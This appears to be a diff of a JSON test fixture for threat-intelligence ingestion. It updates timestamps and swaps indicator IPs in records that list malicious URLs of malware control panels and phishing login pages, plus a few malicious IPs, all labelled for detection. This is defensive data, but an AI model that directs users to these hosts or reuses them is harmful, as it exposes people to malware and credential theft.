@@ -10154,7 +10154,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.385992888Z", + "ingested": "2021-12-13T08:38:40.023749500Z", "original": "{\"created\":\"2020-01-28T03:00:08.397Z\",\"description\":\"TS ID: 55263242037; iType: mal_url; State: active; Org: Avguro Technologies Ltd. Hosting service provider; Source: CyberCrime\",\"id\":\"indicator--c1f7d2e7-4186-47c6-a29b-cdb9bb524732\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-68\"],\"modified\":\"2020-01-28T03:00:08.397Z\",\"name\":\"mal_url: http://j1034033.myjino.ru/laskovo/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://j1034033.myjino.ru/laskovo/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-28T03:00:08.397Z\"}", "category": "threat", "type": "indicator", @@ -10173,7 +10173,7 @@ "object_marking_refs": [ "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" ], - "name": "mal_url: http://85.204.74.152/xcool!/admin.php", + "name": "mal_url: http://89.160.20.156/xcool!/admin.php", "description": "TS ID: 55263241846; iType: mal_url; State: active; Org: UAB Cherry Servers; Source: CyberCrime", "modified": "2020-01-28T03:00:08.446Z", "valid_from": "2020-01-28T03:00:08.446Z", 
@@ -10198,16 +10198,16 @@ "url": { "path": "/xcool!/admin.php", "extension": "php", - "original": "http://85.204.74.152/xcool!/admin.php", + "original": "http://89.160.20.156/xcool!/admin.php", "scheme": "http", - "domain": "85.204.74.152", - "full": "http://85.204.74.152/xcool!/admin.php" + "domain": "89.160.20.156", + "full": "http://89.160.20.156/xcool!/admin.php" } } }, "event": { - "ingested": "2021-12-13T05:57:34.385997276Z", - "original": "{\"created\":\"2020-01-28T03:00:08.446Z\",\"description\":\"TS ID: 55263241846; iType: mal_url; State: active; Org: UAB Cherry Servers; Source: CyberCrime\",\"id\":\"indicator--2ffd18da-452a-462b-a264-4c457564de62\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-61\"],\"modified\":\"2020-01-28T03:00:08.446Z\",\"name\":\"mal_url: http://85.204.74.152/xcool!/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://85.204.74.152/xcool!/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-28T03:00:08.446Z\"}", + "ingested": "2021-12-13T08:38:40.023756700Z", + "original": "{\"created\":\"2020-01-28T03:00:08.446Z\",\"description\":\"TS ID: 55263241846; iType: mal_url; State: active; Org: UAB Cherry Servers; Source: CyberCrime\",\"id\":\"indicator--2ffd18da-452a-462b-a264-4c457564de62\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-61\"],\"modified\":\"2020-01-28T03:00:08.446Z\",\"name\":\"mal_url: http://89.160.20.156/xcool!/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://89.160.20.156/xcool!/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-28T03:00:08.446Z\"}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -10258,7 +10258,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.386001835Z", + "ingested": "2021-12-13T08:38:40.023763900Z", "original": "{\"created\":\"2020-01-28T03:00:22.832Z\",\"description\":\"TS ID: 55263242001; iType: mal_url; State: active; Org: IHNetworks, LLC; Source: CyberCrime\",\"id\":\"indicator--bdb1bbc0-4cfe-484b-8c99-22ff164e345d\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-67\"],\"modified\":\"2020-01-28T03:00:22.832Z\",\"name\":\"mal_url: http://samaaj.org.pk/ejima/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://samaaj.org.pk/ejima/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-28T03:00:22.832Z\"}", "category": "threat", "type": "indicator", @@ -10310,7 +10310,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.386006253Z", + "ingested": "2021-12-13T08:38:40.023771200Z", "original": "{\"created\":\"2020-01-28T03:00:23.929Z\",\"description\":\"TS ID: 55263241843; iType: mal_url; State: active; Org: Saginaw Valley State University; Source: CyberCrime\",\"id\":\"indicator--b708bbd4-d0f4-406e-926e-086fd1bd096e\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-75\"],\"modified\":\"2020-01-28T03:00:23.929Z\",\"name\":\"mal_url: http://155.138.222.174/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://155.138.222.174/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-28T03:00:23.929Z\"}", "category": "threat", "type": "indicator", 
@@ -10362,7 +10362,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.386010651Z", + "ingested": "2021-12-13T08:38:40.023775300Z", "original": "{\"created\":\"2020-01-28T03:00:30.838Z\",\"description\":\"TS ID: 55263241974; iType: mal_url; State: active; Org: IHNetworks, LLC; Source: CyberCrime\",\"id\":\"indicator--384ff3f4-d643-4b23-ad90-9b4fa7524db8\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-67\"],\"modified\":\"2020-01-28T03:00:30.838Z\",\"name\":\"mal_url: http://samaaj.org.pk/emp/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://samaaj.org.pk/emp/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-28T03:00:30.838Z\"}", "category": "threat", "type": "indicator", @@ -10413,7 +10413,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.386015210Z", + "ingested": "2021-12-13T08:38:40.023780600Z", "original": "{\"created\":\"2020-01-28T03:00:52.335Z\",\"description\":\"TS ID: 55263242016; iType: mal_url; State: active; Source: CyberCrime\",\"id\":\"indicator--b5e5a709-1001-4905-9019-d69e53b8393d\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-81\"],\"modified\":\"2020-01-28T03:00:52.335Z\",\"name\":\"mal_url: http://minecraft-only.ru/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://minecraft-only.ru/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-28T03:00:52.335Z\"}", "category": "threat", "type": "indicator", 
@@ -10465,7 +10465,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.386019668Z", + "ingested": "2021-12-13T08:38:40.023786200Z", "original": "{\"created\":\"2020-01-28T03:01:04.475Z\",\"description\":\"TS ID: 55263242040; iType: mal_url; State: active; Org: Uaservers Network; Source: CyberCrime\",\"id\":\"indicator--910b12d0-b553-4219-846e-824ea3be86f8\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-88\"],\"modified\":\"2020-01-28T03:01:04.475Z\",\"name\":\"mal_url: http://buythebest.pw/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://buythebest.pw/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-28T03:01:04.475Z\"}", "category": "threat", "type": "indicator", @@ -10517,7 +10517,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.386023986Z", + "ingested": "2021-12-13T08:38:40.023790500Z", "original": "{\"created\":\"2020-01-28T03:01:04.538Z\",\"description\":\"TS ID: 55263242010; iType: mal_url; State: active; Org: LeaseWeb Netherlands B.V.; Source: CyberCrime\",\"id\":\"indicator--6e7ba339-ede0-47fd-a6c9-bd1ffb61fbbf\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-87\"],\"modified\":\"2020-01-28T03:01:04.538Z\",\"name\":\"mal_url: http://smtress.zzz.com.ua/admin/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://smtress.zzz.com.ua/admin/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-28T03:01:04.538Z\"}", "category": "threat", "type": "indicator", 
@@ -10569,7 +10569,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.386028244Z", + "ingested": "2021-12-13T08:38:40.023794500Z", "original": "{\"created\":\"2020-01-28T03:01:31.533Z\",\"description\":\"TS ID: 55263241845; iType: mal_url; State: active; Org: Choopa, LLC; Source: CyberCrime\",\"id\":\"indicator--1d0c2a7c-ba78-4e9f-ae7a-4ce2988357b1\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-24\"],\"modified\":\"2020-01-28T03:01:31.533Z\",\"name\":\"mal_url: http://149.28.199.128/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://149.28.199.128/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-28T03:01:31.533Z\"}", "category": "threat", "type": "indicator", @@ -10621,7 +10621,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.386033033Z", + "ingested": "2021-12-13T08:38:40.023799700Z", "original": "{\"created\":\"2020-01-29T02:59:29.937Z\",\"description\":\"TS ID: 55266539002; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime\",\"id\":\"indicator--b78ae5fd-ee1e-49ab-9519-fb62ba1bb26a\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-74\"],\"modified\":\"2020-01-29T02:59:29.937Z\",\"name\":\"mal_url: http://ecoorganic.co/Work6/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://ecoorganic.co/Work6/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-29T02:59:29.937Z\"}", "category": "threat", "type": "indicator", 
@@ -10673,7 +10673,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.386037512Z", + "ingested": "2021-12-13T08:38:40.023805Z", "original": "{\"created\":\"2020-01-29T03:00:21.905Z\",\"description\":\"TS ID: 55266539006; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime\",\"id\":\"indicator--ec4322a7-481b-4787-8df2-e3b3bc0c8b8b\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-74\"],\"modified\":\"2020-01-29T03:00:21.905Z\",\"name\":\"mal_url: http://ecoorganic.co/Work2/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://ecoorganic.co/Work2/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-29T03:00:21.905Z\"}", "category": "threat", "type": "indicator", @@ -10725,7 +10725,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.386041780Z", + "ingested": "2021-12-13T08:38:40.023809300Z", "original": "{\"created\":\"2020-01-29T03:00:29.782Z\",\"description\":\"TS ID: 55266539008; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime\",\"id\":\"indicator--cc172be8-7e67-489c-8bd8-8e9ffc11a944\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-81\"],\"modified\":\"2020-01-29T03:00:29.782Z\",\"name\":\"mal_url: http://aikchimhin.com/walterXXXX/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://aikchimhin.com/walterXXXX/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-29T03:00:29.782Z\"}", "category": "threat", "type": "indicator", 
@@ -10776,7 +10776,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.386046048Z", + "ingested": "2021-12-13T08:38:40.023813800Z", "original": "{\"created\":\"2020-01-29T03:00:38.132Z\",\"description\":\"TS ID: 55266538988; iType: mal_url; State: active; Source: CyberCrime\",\"id\":\"indicator--6cb1c4c4-93cb-4ad9-b176-e2a47febafac\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-93\"],\"modified\":\"2020-01-29T03:00:38.132Z\",\"name\":\"mal_url: http://ssgcvb3435fsdgdfg5656sdfgsdfsdf.xyz/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://ssgcvb3435fsdgdfg5656sdfgsdfsdf.xyz/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-29T03:00:38.132Z\"}", "category": "threat", "type": "indicator", @@ -10828,7 +10828,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.386050296Z", + "ingested": "2021-12-13T08:38:40.023817400Z", "original": "{\"created\":\"2020-01-29T03:00:38.721Z\",\"description\":\"TS ID: 55266538999; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime\",\"id\":\"indicator--42f95e09-bad2-4055-bf72-fd3d1f26a173\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-74\"],\"modified\":\"2020-01-29T03:00:38.721Z\",\"name\":\"mal_url: http://ecoorganic.co/Work8/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://ecoorganic.co/Work8/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-29T03:00:38.721Z\"}", "category": "threat", "type": "indicator", 
@@ -10880,7 +10880,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.386054965Z", + "ingested": "2021-12-13T08:38:40.023822500Z", "original": "{\"created\":\"2020-01-29T03:00:51.527Z\",\"description\":\"TS ID: 55266539012; iType: mal_url; State: active; Org: ServerMania; Source: CyberCrime\",\"id\":\"indicator--b9eafbc4-77e3-4b9b-bd34-a15681f0bbec\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-87\"],\"modified\":\"2020-01-29T03:00:51.527Z\",\"name\":\"mal_url: http://corpcougar.com/me/32/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://corpcougar.com/me/32/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-29T03:00:51.527Z\"}", "category": "threat", "type": "indicator", @@ -10932,7 +10932,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.386060535Z", + "ingested": "2021-12-13T08:38:40.023829900Z", "original": "{\"created\":\"2020-01-29T03:01:05.442Z\",\"description\":\"TS ID: 55266539004; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime\",\"id\":\"indicator--9a6acfec-ffa7-47c7-8176-7dbaca7b379f\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-74\"],\"modified\":\"2020-01-29T03:01:05.442Z\",\"name\":\"mal_url: http://ecoorganic.co/Work4/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://ecoorganic.co/Work4/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-29T03:01:05.442Z\"}", "category": "threat", "type": "indicator", 
@@ -10951,7 +10951,7 @@ "object_marking_refs": [ "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" ], - "name": "mal_ip: 78.128.76.165", + "name": "mal_ip: 89.160.20.156", "description": "TS ID: 55266539014; iType: mal_ip; State: active; Org: Lir.bg EOOD; Source: CyberCrime", "modified": "2020-01-29T03:01:13.933Z", "valid_from": "2020-01-29T03:01:13.933Z", @@ -10973,12 +10973,12 @@ "first_seen": "2020-01-29T03:01:13.933Z", "type": "ipv4-addr", "provider": "CyberCrime", - "ip": "78.128.76.165" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T05:57:34.386065264Z", - "original": "{\"created\":\"2020-01-29T03:01:13.933Z\",\"description\":\"TS ID: 55266539014; iType: mal_ip; State: active; Org: Lir.bg EOOD; Source: CyberCrime\",\"id\":\"indicator--5384d504-8760-4255-8daa-dd156dc302d0\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-24\"],\"modified\":\"2020-01-29T03:01:13.933Z\",\"name\":\"mal_ip: 78.128.76.165\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '78.128.76.165']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-29T03:01:13.933Z\"}", + "ingested": "2021-12-13T08:38:40.023834600Z", + "original": "{\"created\":\"2020-01-29T03:01:13.933Z\",\"description\":\"TS ID: 55266539014; iType: mal_ip; State: active; Org: Lir.bg EOOD; Source: CyberCrime\",\"id\":\"indicator--5384d504-8760-4255-8daa-dd156dc302d0\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-24\"],\"modified\":\"2020-01-29T03:01:13.933Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-29T03:01:13.933Z\"}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -11029,7 +11029,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.386069983Z", + "ingested": "2021-12-13T08:38:40.023840600Z", "original": "{\"created\":\"2020-01-29T03:01:31.192Z\",\"description\":\"TS ID: 55266539003; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime\",\"id\":\"indicator--56b347c9-58c9-48d5-a015-2d561d855af2\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-74\"],\"modified\":\"2020-01-29T03:01:31.192Z\",\"name\":\"mal_url: http://ecoorganic.co/Work5/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://ecoorganic.co/Work5/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-29T03:01:31.192Z\"}", "category": "threat", "type": "indicator", @@ -11081,7 +11081,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.386074682Z", + "ingested": "2021-12-13T08:38:40.023846500Z", "original": "{\"created\":\"2020-01-29T03:01:37.815Z\",\"description\":\"TS ID: 55266538992; iType: mal_url; State: active; Org: Exa Bytes Network Sdn.Bhd.; Source: CyberCrime\",\"id\":\"indicator--840739fb-44ae-42f0-805f-422b38422325\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-76\"],\"modified\":\"2020-01-29T03:01:37.815Z\",\"name\":\"mal_url: http://rajas.com.my/wp-content/uploads/2015/nux/Panel/lucifer/Panel/login.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://rajas.com.my/wp-content/uploads/2015/nux/Panel/lucifer/Panel/login.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-29T03:01:37.815Z\"}", "category": "threat", "type": "indicator", 
@@ -11133,7 +11133,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.386078940Z", + "ingested": "2021-12-13T08:38:40.023852100Z", "original": "{\"created\":\"2020-01-29T03:01:49.96Z\",\"description\":\"TS ID: 55266539011; iType: mal_url; State: active; Org: Domain names registrar REG.RU, Ltd; Source: CyberCrime\",\"id\":\"indicator--9ab8a69c-5b95-4fd6-b189-11d90ee54834\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-88\"],\"modified\":\"2020-01-29T03:01:49.96Z\",\"name\":\"mal_url: http://rgmechanics.fun/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://rgmechanics.fun/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-29T03:01:49.96Z\"}", "category": "threat", "type": "indicator", @@ -11185,7 +11185,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.386083238Z", + "ingested": "2021-12-13T08:38:40.023855900Z", "original": "{\"created\":\"2020-01-29T03:02:14.284Z\",\"description\":\"TS ID: 55266539013; iType: mal_url; State: active; Org: Lir.bg EOOD; Source: CyberCrime\",\"id\":\"indicator--96051c6b-3648-43ba-b579-735bd6342ec2\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-91\"],\"modified\":\"2020-01-29T03:02:14.284Z\",\"name\":\"mal_url: http://sbsinstitute.co.in/wp-includes/temp/Panel/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://sbsinstitute.co.in/wp-includes/temp/Panel/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-29T03:02:14.284Z\"}", "category": "threat", "type": "indicator", 
@@ -11237,7 +11237,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.386087696Z", + "ingested": "2021-12-13T08:38:40.023859700Z", "original": "{\"created\":\"2020-01-29T03:02:24.081Z\",\"description\":\"TS ID: 55266539001; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime\",\"id\":\"indicator--d76d300b-07b7-4e9b-b7f1-9e6c0def6a6b\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-74\"],\"modified\":\"2020-01-29T03:02:24.081Z\",\"name\":\"mal_url: http://ecoorganic.co/Work7/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://ecoorganic.co/Work7/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-29T03:02:24.081Z\"}", "category": "threat", "type": "indicator", @@ -11289,7 +11289,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.386091954Z", + "ingested": "2021-12-13T08:38:40.023863700Z", "original": "{\"created\":\"2020-01-29T03:02:31.573Z\",\"description\":\"TS ID: 55266539009; iType: mal_url; State: active; Org: McHost.Ru; Source: CyberCrime\",\"id\":\"indicator--3c61c714-aab6-46e2-abfd-389628870d7d\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-69\"],\"modified\":\"2020-01-29T03:02:31.573Z\",\"name\":\"mal_url: http://v200598.hosted-by-vdsina.ru/dashboard/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://v200598.hosted-by-vdsina.ru/dashboard/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-29T03:02:31.573Z\"}", "category": "threat", "type": "indicator", 
@@ -11341,7 +11341,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.386096402Z", + "ingested": "2021-12-13T08:38:40.023869Z", "original": "{\"created\":\"2020-01-29T03:02:31.605Z\",\"description\":\"TS ID: 55266539007; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime\",\"id\":\"indicator--3c9a39df-b4f3-4529-bfd8-d8b40801e555\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-74\"],\"modified\":\"2020-01-29T03:02:31.605Z\",\"name\":\"mal_url: http://ecoorganic.co/Work1/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://ecoorganic.co/Work1/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-29T03:02:31.605Z\"}", "category": "threat", "type": "indicator", @@ -11360,7 +11360,7 @@ "object_marking_refs": [ "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" ], - "name": "mal_ip: 217.29.57.178", + "name": "mal_ip: 89.160.20.156", "description": "TS ID: 55266538989; iType: mal_ip; State: active; Org: Telenet Ltd.; Source: CyberCrime", "modified": "2020-01-29T03:02:41.021Z", "valid_from": "2020-01-29T03:02:41.021Z", 
@@ -11382,12 +11382,12 @@ "first_seen": "2020-01-29T03:02:41.021Z", "type": "ipv4-addr", "provider": "CyberCrime", - "ip": "217.29.57.178" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T05:57:34.386101522Z", - "original": "{\"created\":\"2020-01-29T03:02:41.021Z\",\"description\":\"TS ID: 55266538989; iType: mal_ip; State: active; Org: Telenet Ltd.; Source: CyberCrime\",\"id\":\"indicator--756932e1-687c-41c9-9b55-2a762c8a1ef3\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-83\"],\"modified\":\"2020-01-29T03:02:41.021Z\",\"name\":\"mal_ip: 217.29.57.178\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '217.29.57.178']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-29T03:02:41.021Z\"}", + "ingested": "2021-12-13T08:38:40.023873500Z", + "original": "{\"created\":\"2020-01-29T03:02:41.021Z\",\"description\":\"TS ID: 55266538989; iType: mal_ip; State: active; Org: Telenet Ltd.; Source: CyberCrime\",\"id\":\"indicator--756932e1-687c-41c9-9b55-2a762c8a1ef3\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-83\"],\"modified\":\"2020-01-29T03:02:41.021Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-29T03:02:41.021Z\"}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -11438,7 +11438,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.386105840Z", + "ingested": "2021-12-13T08:38:40.023878Z", "original": "{\"created\":\"2020-01-29T03:02:42.284Z\",\"description\":\"TS ID: 55266539010; iType: mal_url; State: active; Org: McHost.Ru; Source: CyberCrime\",\"id\":\"indicator--e34dc439-4789-4d5a-b7dc-471fb473f4a0\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-68\"],\"modified\":\"2020-01-29T03:02:42.284Z\",\"name\":\"mal_url: http://v178903.hosted-by-vdsina.ru/dashboard/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://v178903.hosted-by-vdsina.ru/dashboard/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-29T03:02:42.284Z\"}", "category": "threat", "type": "indicator", @@ -11490,7 +11490,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.386110789Z", + "ingested": "2021-12-13T08:38:40.023881600Z", "original": "{\"created\":\"2020-01-29T03:02:42.335Z\",\"description\":\"TS ID: 55266538994; iType: mal_url; State: active; Org: Unified Layer; Source: CyberCrime\",\"id\":\"indicator--a30fe926-53b8-43fe-a792-8ecd41071dd7\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-81\"],\"modified\":\"2020-01-29T03:02:42.335Z\",\"name\":\"mal_url: http://tickerqube.com/Loki2020/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://tickerqube.com/Loki2020/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-29T03:02:42.335Z\"}", "category": "threat", "type": "indicator", 
